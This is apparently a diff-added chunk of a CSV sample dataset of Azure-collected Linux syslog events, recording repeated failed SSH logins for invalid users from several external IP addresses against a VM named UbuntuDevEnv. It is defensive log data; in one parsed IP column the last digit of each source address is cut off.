+13087,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:28:03,UbuntuDevEnv,2019-06-26 04:28:03,auth,UbuntuDevEnv,info,Invalid user mie from 177.23.90.10 port 33180,127248,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mie,177.23.90.1,33180,,
+13088,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:28:03,UbuntuDevEnv,2019-06-26 04:28:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,127248,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13089,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:28:03,UbuntuDevEnv,2019-06-26 04:28:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=177.23.90.10,127248,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,177.23.90.1,,0,
+13090,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:28:06,UbuntuDevEnv,2019-06-26 04:28:05,auth,UbuntuDevEnv,info,Failed password for invalid user mie from 177.23.90.10 port 33180 ssh2,127248,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mie,177.23.90.1,33180,,
+13091,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:28:06,UbuntuDevEnv,2019-06-26 04:28:05,auth,UbuntuDevEnv,info,Received disconnect from 177.23.90.10 port 33180:11: Bye Bye [preauth],127248,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,177.23.90.1,33180,,
+13092,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:28:06,UbuntuDevEnv,2019-06-26 04:28:05,auth,UbuntuDevEnv,info,Disconnected from invalid user mie 177.23.90.10 port 33180 [preauth],127248,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mie,177.23.90.1,33180,,
+13093,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:28:08,UbuntuDevEnv,2019-06-26 04:28:08,auth,UbuntuDevEnv,info,Invalid user 1234 from 95.216.195.95 port 54116,127288,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,1234,95.216.195.9,54116,,
+13094,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:28:08,UbuntuDevEnv,2019-06-26 04:28:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,127288,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13095,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:28:08,UbuntuDevEnv,2019-06-26 04:28:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=95.216.195.95,127288,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,95.216.195.9,,0,
+13096,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:28:10,UbuntuDevEnv,2019-06-26 04:28:09,auth,UbuntuDevEnv,info,Failed password for invalid user 1234 from 95.216.195.95 port 54116 ssh2,127288,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,1234,95.216.195.9,54116,,
+13097,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:28:10,UbuntuDevEnv,2019-06-26 04:28:10,auth,UbuntuDevEnv,info,Disconnected from invalid user 1234 95.216.195.95 port 54116 [preauth],127288,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,1234,95.216.195.9,54116,,
+13098,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:28:10,UbuntuDevEnv,2019-06-26 04:28:10,auth,UbuntuDevEnv,info,Received disconnect from 95.216.195.95 port 54116:11: Bye Bye [preauth],127288,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,95.216.195.9,54116,,
+13099,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:29:13,UbuntuDevEnv,2019-06-26 04:29:13,auth,UbuntuDevEnv,info,Invalid user ftp from 200.6.188.38 port 38617,127513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,200.6.188.3,38617,,
+13100,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:29:13,UbuntuDevEnv,2019-06-26 04:29:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,127513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13101,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:29:13,UbuntuDevEnv,2019-06-26 04:29:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.6.188.38,127513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.6.188.3,,0,
+13102,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:29:15,UbuntuDevEnv,2019-06-26 04:29:14,auth,UbuntuDevEnv,info,Failed password for invalid user ftp from 200.6.188.38 port 38617 ssh2,127513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,200.6.188.3,38617,,
+13103,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:29:15,UbuntuDevEnv,2019-06-26 04:29:15,auth,UbuntuDevEnv,info,Disconnected from invalid user ftp 200.6.188.38 port 38617 [preauth],127513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,200.6.188.3,38617,,
+13104,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:29:15,UbuntuDevEnv,2019-06-26 04:29:15,auth,UbuntuDevEnv,info,Received disconnect from 200.6.188.38 port 38617:11: Bye Bye [preauth],127513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.6.188.3,38617,,
+13105,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:29:25,UbuntuDevEnv,2019-06-26 04:29:24,auth,UbuntuDevEnv,info,Invalid user r00t from 5.135.161.72 port 46862,127552,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,r00t,5.135.161.7,46862,,
+13106,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:29:25,UbuntuDevEnv,2019-06-26 04:29:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=5.135.161.72,127552,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.135.161.7,,0,
+13107,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:29:25,UbuntuDevEnv,2019-06-26 04:29:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,127552,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13108,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:29:27,UbuntuDevEnv,2019-06-26 04:29:26,auth,UbuntuDevEnv,info,Failed password for invalid user r00t from 5.135.161.72 port 46862 ssh2,127552,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,r00t,5.135.161.7,46862,,
+13109,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:29:27,UbuntuDevEnv,2019-06-26 04:29:26,auth,UbuntuDevEnv,info,Received disconnect from 5.135.161.72 port 46862:11: Bye Bye [preauth],127552,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,5.135.161.7,46862,,
+13110,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:29:27,UbuntuDevEnv,2019-06-26 04:29:26,auth,UbuntuDevEnv,info,Disconnected from invalid user r00t 5.135.161.72 port 46862 [preauth],127552,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,r00t,5.135.161.7,46862,,
+13111,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:29:40,UbuntuDevEnv,2019-06-26 04:29:40,auth,UbuntuDevEnv,info,Invalid user kyle123 from 95.216.195.95 port 42768,127605,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kyle123,95.216.195.9,42768,,
+13112,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:29:40,UbuntuDevEnv,2019-06-26 04:29:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,127605,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13113,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:29:40,UbuntuDevEnv,2019-06-26 04:29:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=95.216.195.95,127605,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,95.216.195.9,,0,
+13114,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:29:43,UbuntuDevEnv,2019-06-26 04:29:42,auth,UbuntuDevEnv,info,Failed password for invalid user kyle123 from 95.216.195.95 port 42768 ssh2,127605,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kyle123,95.216.195.9,42768,,
+13115,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:29:43,UbuntuDevEnv,2019-06-26 04:29:42,auth,UbuntuDevEnv,info,Received disconnect from 95.216.195.95 port 42768:11: Bye Bye [preauth],127605,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,95.216.195.9,42768,,
+13116,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:29:43,UbuntuDevEnv,2019-06-26 04:29:42,auth,UbuntuDevEnv,info,Disconnected from invalid user kyle123 95.216.195.95 port 42768 [preauth],127605,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kyle123,95.216.195.9,42768,,
+13117,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:30:15,UbuntuDevEnv,2019-06-26 04:30:15,auth,UbuntuDevEnv,info,Invalid user mailserv from 196.41.208.238 port 19760,127770,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mailserv,196.41.208.2,19760,,
+13118,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:30:15,UbuntuDevEnv,2019-06-26 04:30:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,127770,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13119,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:30:15,UbuntuDevEnv,2019-06-26 04:30:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.41.208.238,127770,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.41.208.2,,0,
+13120,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:30:16,UbuntuDevEnv,2019-06-26 04:30:16,auth,UbuntuDevEnv,info,Invalid user oracle from 177.23.90.10 port 36338,127766,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,177.23.90.1,36338,,
+13121,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:30:16,UbuntuDevEnv,2019-06-26 04:30:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,127766,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13122,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:30:16,UbuntuDevEnv,2019-06-26 04:30:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=177.23.90.10,127766,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,177.23.90.1,,0,
+13123,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:30:18,UbuntuDevEnv,2019-06-26 04:30:17,auth,UbuntuDevEnv,info,Failed password for invalid user mailserv from 196.41.208.238 port 19760 ssh2,127770,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mailserv,196.41.208.2,19760,,
+13124,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:30:18,UbuntuDevEnv,2019-06-26 04:30:18,auth,UbuntuDevEnv,info,Disconnected from invalid user mailserv 196.41.208.238 port 19760 [preauth],127770,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mailserv,196.41.208.2,19760,,
+13125,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:30:18,UbuntuDevEnv,2019-06-26 04:30:18,auth,UbuntuDevEnv,info,Received disconnect from 196.41.208.238 port 19760:11: Bye Bye [preauth],127770,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.41.208.2,19760,,
+13126,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:30:19,UbuntuDevEnv,2019-06-26 04:30:19,auth,UbuntuDevEnv,info,Failed password for invalid user oracle from 177.23.90.10 port 36338 ssh2,127766,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,177.23.90.1,36338,,
+13127,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:30:20,UbuntuDevEnv,2019-06-26 04:30:19,auth,UbuntuDevEnv,info,Disconnected from invalid user oracle 177.23.90.10 port 36338 [preauth],127766,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,177.23.90.1,36338,,
+13128,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:30:20,UbuntuDevEnv,2019-06-26 04:30:19,auth,UbuntuDevEnv,info,Received disconnect from 177.23.90.10 port 36338:11: Bye Bye [preauth],127766,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,177.23.90.1,36338,,
+13129,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:30:56,UbuntuDevEnv,2019-06-26 04:30:55,auth,UbuntuDevEnv,info,Invalid user starbound from 5.135.161.72 port 35394,127968,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,starbound,5.135.161.7,35394,,
+13130,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:30:56,UbuntuDevEnv,2019-06-26 04:30:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=5.135.161.72,127968,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.135.161.7,,0,
+13131,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:30:56,UbuntuDevEnv,2019-06-26 04:30:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,127968,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13132,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:30:57,UbuntuDevEnv,2019-06-26 04:30:57,auth,UbuntuDevEnv,info,Failed password for invalid user starbound from 5.135.161.72 port 35394 ssh2,127968,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,starbound,5.135.161.7,35394,,
+13133,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:30:57,UbuntuDevEnv,2019-06-26 04:30:57,auth,UbuntuDevEnv,info,Received disconnect from 5.135.161.72 port 35394:11: Bye Bye [preauth],127968,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,5.135.161.7,35394,,
+13134,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:30:57,UbuntuDevEnv,2019-06-26 04:30:57,auth,UbuntuDevEnv,info,Disconnected from invalid user starbound 5.135.161.72 port 35394 [preauth],127968,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,starbound,5.135.161.7,35394,,
+13135,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:31:00,UbuntuDevEnv,2019-06-26 04:30:59,auth,UbuntuDevEnv,info,Invalid user minecraft from 200.6.188.38 port 52028,127983,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,minecraft,200.6.188.3,52028,,
+13136,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:31:00,UbuntuDevEnv,2019-06-26 04:30:59,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,127983,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13137,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:31:00,UbuntuDevEnv,2019-06-26 04:30:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.6.188.38,127983,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.6.188.3,,0,
+13138,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:31:02,UbuntuDevEnv,2019-06-26 04:31:01,auth,UbuntuDevEnv,info,Failed password for invalid user minecraft from 200.6.188.38 port 52028 ssh2,127983,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,minecraft,200.6.188.3,52028,,
+13139,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:31:02,UbuntuDevEnv,2019-06-26 04:31:01,auth,UbuntuDevEnv,info,Disconnected from invalid user minecraft 200.6.188.38 port 52028 [preauth],127983,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,minecraft,200.6.188.3,52028,,
+13140,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:31:02,UbuntuDevEnv,2019-06-26 04:31:01,auth,UbuntuDevEnv,info,Received disconnect from 200.6.188.38 port 52028:11: Bye Bye [preauth],127983,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.6.188.3,52028,,
+13141,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:31:03,UbuntuDevEnv,2019-06-26 04:31:02,auth,UbuntuDevEnv,info,Connection closed by 119.123.240.8 port 40917 [preauth],127978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.123.240.8,40917,,
+13142,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:31:09,UbuntuDevEnv,2019-06-26 04:31:08,auth,UbuntuDevEnv,info,Invalid user test7 from 95.216.195.95 port 59586,128026,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test7,95.216.195.9,59586,,
+13143,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:31:09,UbuntuDevEnv,2019-06-26 04:31:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,128026,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13144,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:31:09,UbuntuDevEnv,2019-06-26 04:31:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=95.216.195.95,128026,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,95.216.195.9,,0,
+13145,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:31:11,UbuntuDevEnv,2019-06-26 04:31:10,auth,UbuntuDevEnv,info,Failed password for invalid user test7 from 95.216.195.95 port 59586 ssh2,128026,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test7,95.216.195.9,59586,,
+13146,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:31:11,UbuntuDevEnv,2019-06-26 04:31:10,auth,UbuntuDevEnv,info,Received disconnect from 95.216.195.95 port 59586:11: Bye Bye [preauth],128026,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,95.216.195.9,59586,,
